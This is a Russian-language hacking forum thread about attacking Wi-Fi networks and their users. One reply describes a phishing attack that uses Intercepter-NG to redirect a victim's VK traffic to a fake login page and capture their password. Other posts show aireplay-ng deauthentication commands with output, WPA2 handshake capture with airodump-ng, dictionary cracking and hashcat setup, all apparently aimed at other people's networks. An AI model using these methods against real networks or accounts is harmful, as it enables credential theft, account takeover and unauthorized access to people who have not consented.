А есть в природе какой нибудь эксплоит, который через локальную сеть может подрезать пароли от wifi, сохраненные на компьютере?
Можно. 1. SoftPerfect WiFi Guard - сайт где можно скачать актуал https://www.softperfect.com/ Сейчас только ей и пользуюсь. 2. Есть ещё несколько утилит от http://www.nirsoft.net/ NetworkConnectLog, Wireless Network Watcher... и что-то там ещё. Это бесплатные и легко доступные. Показывают клиентов на точке если сам к ней подключен. Клиенты только по WiFi. 3. MyLanViewer Network - платен. Показывают клиентов на точке если сам к ней подключен. Клиенты по Lan и WiFi. Все же CommView - универсальный инструмент - платен. Показывают клиентов на точках, что в округе без подключения к ним. Клиенты по Lan и WiFi. Но,... не со всеми адаптерами работает. 1, 2, 3 - работают с любыми адаптерами.
Без подключения, можно еще этим софтом посмотреть. WifiChannelMonitor. http://www.nirsoft.net/utils/wifi_channel_monitor.html Acrylic WiFi Free (Professional). https://www.acrylicwifi.com/ru/продукты-для-безопасности-и-инспекти/сканер-сетей-wi-fi-acrylic-wifi-free/ https://www.acrylicwifi.com/ru/продукты-для-безопасности-и-инспекти/продвинутый-анализатор-wi-fi-acrylic-wifi-professional/
Ситуация, есть точка Wifi к ней подключается телефон на андроиде. Как перехватить сессию ВК или пароли? Как автоматизировать процесс, чтобы не сидеть рядом, есть возможность подключить компьютер к точке по Wifi и Ethernet и оставить его.
FlatL1ne, вынудить пользователся залогиниться через браузер. В программе intercepter-ng можно переадресовать все запросы к айпишникам вк и сделать переадресацию на фейковый вк который находится на локалхосте. Поднять вэб сервер у себя на машине и положить туда фейковую страницу авторизации вк. т.е у юзера перестанет работать приложение вк и, скорее всего, он попытается войти через браузер. Он пропишет в адресной строке vk.com и попает на нашу фишинговую страницу(фейк), введет логин и пасс, ???, profit.
ситуация: есть АР но в airodump'е клиентов подключенных по wifi нет(handshake не поймать), что можно попробовать для получения пароля/handshake от АР
Кто нибудь находил пароль из своих словарей содержащий спец символы, в том числе и пробел? если да, то какой максимальной длинны? Меня интересует вопрос статистики. Т.к. в словарях есть куча комбинаций свыше 17 символов и содержащие спецсимволы. Считаю их бесполезными.
Не появляется надпись handshake! В чём может быть проблема? В заранее Спасибо! Code: CH 6 ][ Elapsed: 21 mins ][ 2015-06-04 09:02 ][ fixed channel mon0: -1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 34:07:FB:5E:FD:D5 0 100 6944 458 0 6 54e. WPA2 CCMP PSK Wifi1 BSSID STATION PWR Rate Lost Packets Probes 34:07:FB:5E:FD:D5 18:FE:34:27:9E:4B 0 1e- 1 1064 202807 Code: sudo aireplay-ng -0 16 -a 34:07:FB:5E:FD:D5 -c 18:FE:34:27:9E:4B mon0 --ignore-negative-one 09:05:50 Waiting for beacon frame (BSSID: 34:07:FB:5E:FD:D5) on channel -1 09:05:50 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:51 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:51 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:52 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:53 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:53 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:54 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:54 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:55 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:55 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:56 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:56 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:57 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:58 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:58 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] 09:05:59 Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs] Точку бомбил не однократно делал даже так: sudo aireplay-ng -0 5000 -a 34:07:FB:5E:FD: D5 -c 18:FE:34:27:9E:4B mon0 --ignore-negative-one Code: sudo aireplay-ng -0 10 -a 34:07:FB:5E:FD:D5 -c 94:44:44:F5:D9:49 mon0 --ignore-negative-one 09:34:30 Waiting for beacon frame (BSSID: 34:07:FB:5E:FD:D5) on channel -1 09:34:30 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 5|48 ACKs] 09:34:31 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 4|42 ACKs] 09:34:32 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 1|37 ACKs] 09:34:32 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 6|51 ACKs] 09:34:33 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 5|43 ACKs] 09:34:33 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|43 ACKs] 09:34:34 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|47 ACKs] 09:34:34 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|46 ACKs] 09:34:35 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|52 ACKs] 09:34:35 Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|46 ACKs]
Проблема в fixed channel mon0: -1. handshake то наверняка пойман, просто неотображается надпись... Проверить наличие handshak-а в файле можно с помощью: aircrack-ng имя_файла.cap Ну а вообще, прежде чем переводить карту в monitor mode её необходимо сначала подготовить (как я называю, потушить)... ifconfig wlan0 d..n гугли...
Не могу установить hashcat! )))))=D Буду рад если подскажете команды для установки. Apt-get install hashcat - можете даже не писать.